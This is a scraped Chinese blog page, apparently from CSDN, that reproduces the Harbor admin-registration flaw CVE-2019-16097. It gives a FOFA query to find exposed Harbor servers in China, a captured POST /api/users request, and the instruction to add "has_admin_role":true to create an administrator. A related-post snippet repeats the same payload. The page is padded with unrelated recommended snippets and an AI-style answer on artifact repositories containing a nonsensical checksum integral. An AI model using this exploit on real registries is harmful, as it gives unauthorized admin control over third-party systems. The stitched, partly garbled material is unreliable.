Harbor未授权创建管理员漏洞(CVE-2019-16097)

最新推荐文章于 2025-07-14 09:12:43 发布
最新推荐文章于 2025-07-14 09:12:43 发布
阅读量2.2k 收藏 3
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: cve-2019-16097 harbor 创建管理员
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sojrs_sec/article/details/101778371

环境准备

fofa搜索环境

title="Harbor" && country=CN

找到一个可用环境测试

测试

注册账号,填写账号信息后抓包

POST /api/users HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 111
Connection: close
Referer: https://103.24.179.7/harbor/sign-in?signout=true
Cookie: beegosessionID=c2309d1e5295946e5c1d59e7c63bf5a0

{"username":"whami123","email":"whoami123@qq.com","realname":"whoami123","password":"Whoami123_","comment":"2"}

在包内容里面添加"has_admin_role":true,即

POST /api/users HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel
最低0.47元/天 解锁文章

200万优质内容无限畅学
Harbor未授权创建管理员
「应无所住而生其心」
07-11 685
人处在幸福与不幸交织的矛盾之中,反而使内心有一种更为深刻的痛苦,看来近在眼前的幸福而实际上又远得相当渺茫,海市蜃楼。放不得抓不住。
11、利用 Harbor 管理容器镜像
k8l9m0n的博客
06-27 7
本文详细介绍了 Harbor 在容器镜像管理中的重要作用,包括其在安全性、操作控制和可扩展性方面的优势,并深入解析了 Harbor 的内部结构。文章还提供了 Harbor 的安装配置步骤及常见日常操作,帮助用户快速上手并高效管理容器镜像,提升云原生应用的开发与部署效率。
Harbor默认Redis与Notary组件弱口令漏洞分析与修复指南
qq_44397993的博客
04-29 705
harbor在安装的代码文件中会定义一个docker-compose模板文件,上图就是我截取的一部分,它会通过common/config/notary目录下定义的server和signer的env文件获取对应变量。首先需求确认这三个用户是harbor那个组件使用,最好确认的是default这个用户,它是redis的默认用户,server、signer这两个在harbor.yml配置文件的引用外部组件中有定义,涉及到notary这个组件。core/env文件,123123就是你要设置的redis密码。
harbor安装_Harbor任意管理员注册漏洞(CVE-2019-16097)
weixin_39790877的博客
11-30 340
0x00 Harbor简介 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。 作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。0x01 原理概述 ...
Harbor任意管理员注册漏洞(CVE-2019-16097)复现
test\\的博客
10-13 1674
Harbor任意管理员注册漏洞复现 fhh# 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博...
Harbor 镜像仓库存在未授权访问漏洞
whoami
01-16 8168
Harbor 受影响版本中镜像仓库存在访问控制缺陷,攻击者可通过页面搜索镜像名称,绕过登陆验证逻辑,直接查看结果中未授权的私有镜像仓库并获取仓库信息(Pull、Push的时间和commit信息,以及镜像存在的漏洞信息等)。本漏洞广泛存在于业界使用的harbor版本中。不过harbor常放置于企业内网,可以缓解该问题。Harbor 是一个开源的 Docker Registry 管理项目,用于托管容器镜像。升级harbor到 2.6.0 或更高版本。
Harbor未授权访问漏洞
菜鸟的自学之路
12-27 1064
Harbor未授权访问漏洞
Harbor禁用swagger.json(Swagger未授权访问漏洞
从云原生运维转网络安全。
09-15 4392
VMwareHarbor镜像仓库默认使用了swagger ui,也因此暴露了swagger.json文件。在安全要求高的环境下会触发“Swagger未授权访问漏洞”,虽然暴露的信息不是特别关键。但仍然是信息泄露,需要禁用swagger.json的访问。
Harbor未授权访问漏洞CVE-2022-46463)
热门推荐
m0_49025459的博客
04-29 1万+
是为企业用户设计的容器镜像仓库开源项目,包括了权限管理(RBAC)、LDAP、审计、安全漏洞扫描、镜像验真、管理界面、自我注册、HA等企业必需的功能,同时针对中国用户的特点,设计镜像复制和中文支持等功能。
K8S--解决访问Harbor私有仓库无权限的问题(401 Unauthorized)
IT利刃出鞘的博客
01-18 3943
本文解决K8S访问Harbor私有仓库无权限的问题:401 Unauthorized。
红队攻防文库
「应无所住而生其心」
08-23 672
各家兴便是天下大同
一文学会Harbor多租户管理:从权限控制到资源隔离
最新发布
StevenZeng学堂
07-14 541
❤️ 摘要: 云原生环境中,镜像仓库的多租户管理是确保资源隔离、权限控制和高效协作的重要组成部分。Harbor 作为一个开源的企业级镜像仓库,它提供了强大的多租户管理功能,包括用户管理、角色分配、项目隔离等。本文将带你快速掌握如何在 Harbor 中实现高效的多租户管理。
CVE-2019-16097 || Harbor任意管理员注册漏洞复现
Summer's blog
05-13 3942
目录 0x01 前言 0x02 漏洞简介及危害 0x03 漏洞复现 0x04 修复建议 #0x01 前言 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全...
CVE-2019-16097Harbor任意管理员注册漏洞复现
Sylon的博客
10-10 1215
0x00 Harbor简介 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。 作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。 0x01 原理概述 该漏...
Harbor越权任意管理员注册复现(CVE-2019-16097)
OKAY_TC的博客
01-16 753
核心添加字段:"has_admin_role":true 正常注册: 添加管理员权限字段:"has_admin_role":true
Harbor任意管理员注册漏洞复现CVE-2019-16097
ddr12231的博客
09-21 323
注册时抓包 添加poc "has_admin_role":true 管理员权限 POC POST /api/users HTTP/1.1 Host: 127.0.0.1 Content-Length: 131 Accept: application/json Origin: http://127.0.0.1 User-Agent: Opera/9.80 (Windows NT 6....
未授权访问漏洞总结
LuckySec
03-24 5818
前言:这篇文章主要收集一些常见的未授权访问漏洞未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 未授权漏洞预览 Active MQ 未授权访问 Atlassian Crowd 未授权访问 CouchDB 未授权访问 Docker 未授权访问 Dubbo 未授权访问 Druid 未授权访问 Elasticsearch 未授权访问 FTP 未授权访问 Hadoop 未授权访问 JBoss 未授权访
2.未授权访问漏洞复现
weixin_52963334的博客
09-08 566
作业。
制品库public库和项目私有库的方案如何做。也就是教别人如何使用
04-04
<think>嗯,用户问的是制品库public库和项目私有库的方案如何做,需要教别人怎么使用。首先,我得明确这两个概念。制品库通常用于存储构建产物,比如jar包、npm包、docker镜像等。public库是公开的,所有人都可以访问,可能用于开源项目或者公共依赖。而项目私有库则是私有的,只有特定项目或团队有权限访问,存放内部依赖或敏感组件。 接下来,我需要考虑常见的制品库管理工具,比如Nexus、JFrog Artifactory、Harbor(针对Docker)等。不同的工具配置方法可能不同,但基本思路应该相似。用户可能需要具体的步骤,比如如何创建仓库、配置权限、集成到构建工具中。 然后,用户可能需要了解如何区分public和私有库的使用场景。比如,公共依赖从public库拉取,私有项目则使用私有库,确保安全性和隔离性。权限管理是关键,需要设置不同的用户角色,比如public库只读,私有库读写权限给特定团队。 另外,可能涉及到持续集成/持续部署(CI/CD)的集成。比如,在构建时根据项目类型决定推送到哪个仓库,或者在拉取依赖时优先查找私有库,再查找public库。这里需要说明配置仓库的顺序,比如Maven的settings.xml中配置镜像优先级。 还有版本控制的问题,私有库可能需要更严格的版本管理策略,比如快照版本和正式版本的分离。同时,清理策略也很重要,public库可能需要定期清理旧版本以节省空间,而私有库可能需要保留更长时间的历史版本。 安全方面,私有库需要HTTPS访问、身份验证和授权,比如使用API密钥或令牌。而public库可能允许匿名访问,但上传仍需认证。还需要考虑漏洞扫描,确保上传的制品没有安全风险。 最后,可能需要给出一个具体工具的示例步骤,比如使用Nexus Repository Manager。分步骤创建两个仓库,配置权限,然后在项目中配置构建文件指向对应的仓库。同时,提醒用户测试配置是否正确,比如上传和拉取制品是否正常。 可能还需要注意不同语言生态系统的差异,比如Maven、npm、Docker等的配置方式不同,需要分别说明。或者用户可能只关心其中一种,但提问比较通用,所以需要覆盖主要方面,但保持简洁。 总结下来,回答应该分步骤,先介绍概念,再讲方案设计,然后具体实施步骤,包括创建仓库、配置权限、集成到项目、CI/CD流程、安全措施等。最后给出注意事项和常见问题,比如依赖解析顺序、版本管理建议。</think>制品库的公共库与私有库建设方案(以通用架构为例) 一、核心概念区分 1. 公共库(Public Repository) - 用途:存放公共依赖、第三方开源组件 - 权限:全局可读,受限写入(需审核) - 示例:$$ \text{public-repo} \rightarrow \text{存放如jquery-3.6.0.min.js} $$ 2. 项目私有库(Private Repository) - 用途:存放内部构建产物、私有组件 - 权限:按项目组隔离(RBAC控制) - 示例:$$ \text{projectA-private} \rightarrow \text{存放如projectA-utils-1.2.3.jar} $$ 二、实施方案步骤 1. 基础设施搭建 - 工具选型:Nexus/Artifactory/Harbor - 存储规划: ```text /data ├── public # SSD存储用于高频访问 └── private # HDD存储扩展容量 ``` 2. 仓库创建示例(以Nexus3为例) ```bash # 创建公共代理仓库 nx-repo-create proxy npm-public https://registry.npmjs.org # 创建私有宿主仓库 nx-repo-create hosted maven-private -type maven2 ``` 3. 权限配置关键点 ```markdown | 角色 | 公共库权限 | 私有库权限 | |---------------|----------------|----------------| | 匿名用户 | 只读 | 无访问 | | 开发者 | 只读 | 本组项目读写 | | 审核员 | 审核后写入 | 跨项目只读 | ``` 4. 项目集成配置(以Maven为例) ```xml <!-- settings.xml 配置示例 --> <mirrors> <mirror> <id>private-repo</id> <url>http://repo.internal/private-group/</url> <mirrorOf>external:*,!public-repo</mirrorOf> </mirror> </mirrors> ``` 三、最佳实践建议 1. 依赖解析策略 - 优先顺序:私有库 > 公共代理库 > 中央仓库 - 公式表达:$$ \text{ResolutionOrder} = \text{Private} \rightarrow \text{PublicProxy} \rightarrow \text{Central} $$ 2. 版本控制方案 - 快照版本:自动清理策略(保留最近5个版本) - 正式版本:手动审批后永久保留 3. 安全增强措施 - 公共库启用CVE扫描:$$ \text{scan}(artifact) \rightarrow \text{阻断高危漏洞版本} $$ - 私有库实施双因素认证 - 传输层强制使用HTTPS 四、典型工作流示例 ```text 开发者流程: 1. 开发阶段:从公共库拉取依赖 $ mvn dependency:get -Dartifact=log4j:log4j:1.2.17 2. 构建阶段:发布到私有库 $ mvn deploy -DaltDeploymentRepository=private-repo::default::http://repo.internal/projectA-private 3. 生产部署:从私有库获取已验证版本 $ docker pull repo.internal/projectA-private/app-image:v1.2.3 ``` 五、运维监控要点 1. 容量预警阈值设置: - 公共库:$$ \text{剩余空间} < 30\% \Rightarrow \text{触发告警} $$ - 私有库:按项目组配额管理 2. 访问日志分析 ```sql -- 统计Top10依赖下载 SELECT artifact, COUNT(*) as downloads FROM access_log WHERE repo_type = 'public' GROUP BY artifact ORDER BY downloads DESC LIMIT 10; ``` 注意事项: 1. 公共库建议采用地理分布式的CDN加速 2. 私有库部署时应配置跨可用区冗余 3. 定期执行存储验证:$$ \int_{t_0}^{t_1} checksum(artifact) dt = \text{一致性保证} $$
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值